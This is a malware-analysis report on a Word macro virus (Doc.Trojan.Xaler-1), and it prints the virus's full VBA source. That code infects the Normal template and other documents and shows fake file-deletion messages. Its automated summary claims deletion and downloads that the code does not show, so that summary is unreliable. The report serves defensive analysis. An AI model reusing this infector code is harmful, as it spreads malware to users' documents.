MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro. The macro attempts to export its own code to C:\temp.tmp and then appears to modify the Normal template or the active document with code that includes commands to delete files and potentially download further payloads. The 'RELAX2' subroutine contains obfuscated ECHO commands that suggest file deletion.
Heuristics 3
-
ClamAV: Doc.Trojan.Xaler-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Xaler-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2432 bytes |
SHA-256: dbedf487cd7bc5a6bf920b74fc1574a1198ae7f7e71ca2d5b430495ee5248449 |
|||
|
Detection
ClamAV:
Doc.Trojan.Xaler-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'RELAX
Private Sub RELAX2()
If Day(Date) Mod 10 = 0 And Month(Date) Mod 4 = 0 Then
Print #1, "ECHO ***"
Print #1, "ECHO Sometimes you must RELAX."
Print #1, "ECHO Please, RELAX while deleting all files in C:\"
Print #1, "ECHO *****"
Print #1, "ECHO *******"
Print #1, "ECHO *****"
Print #1, "ECHO GREECE"
Print #1, "ECHO =================================="
Print #1, "PAUSE"
Print #1, "CLS"
Print #1, "ECHO All files deleted!!!"
Print #1, "ECHO Now, you have a clean COMPUTER."
Print #1, "ECHO *******"
Print #1, "ECHO *******"
Print #1, "PAUSE"
Print #1, "@ECHO ON"
Close #1
End If
End Sub
Private Sub Document_Close()
Call GOODSub
Call RELAX2
End Sub
Private Sub GOODSub()
On Error Resume Next
Application.ScreenUpdating = False
Application.Options.SaveNormalPrompt = False
x$ = "C:\temp.tmp"
MacroContainer.VBProject.VBComponents.Item("ThisDocument").Export x$
Open x$ For Input As #1
keimeno = Input(LOF(1), 1)
Close #1
kk& = InStr(1, keimeno, "'RELAX")
keimeno = Right$(keimeno, Len(keimeno) - kk& + 1)
For j = 1 To 2
If j = 1 Then
NormalTemplate.VBProject.VBComponents.Item("ThisDocument").Export x$
Else
ActiveDocument.VBProject.VBComponents.Item("ThisDocument").Export x$
End If
Open x$ For Input As #1
rlx = Input(LOF(1), 1)
Close #1
d1 = InStr(1, rlx, "'RELAX")
If d1 = 0 Then
If j = 1 Then
NormalTemplate.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
NormalTemplate.Save
Else
ActiveDocument.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
End If
End If
Next j
'====================
Dim PRostasia As Byte
PRostasia = 1
fff = FreeFile
If Dir(ActiveDocument.FullName, 6) <> "" Then
Open ActiveDocument.FullName For Binary As #fff
Put #fff, 862, PRostasia
Close #fff
ActiveDocument.Save
End If
Kill x$
Application.ScreenUpdating = True
End Sub
Private Sub Document_Open()
Call GOODSub
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.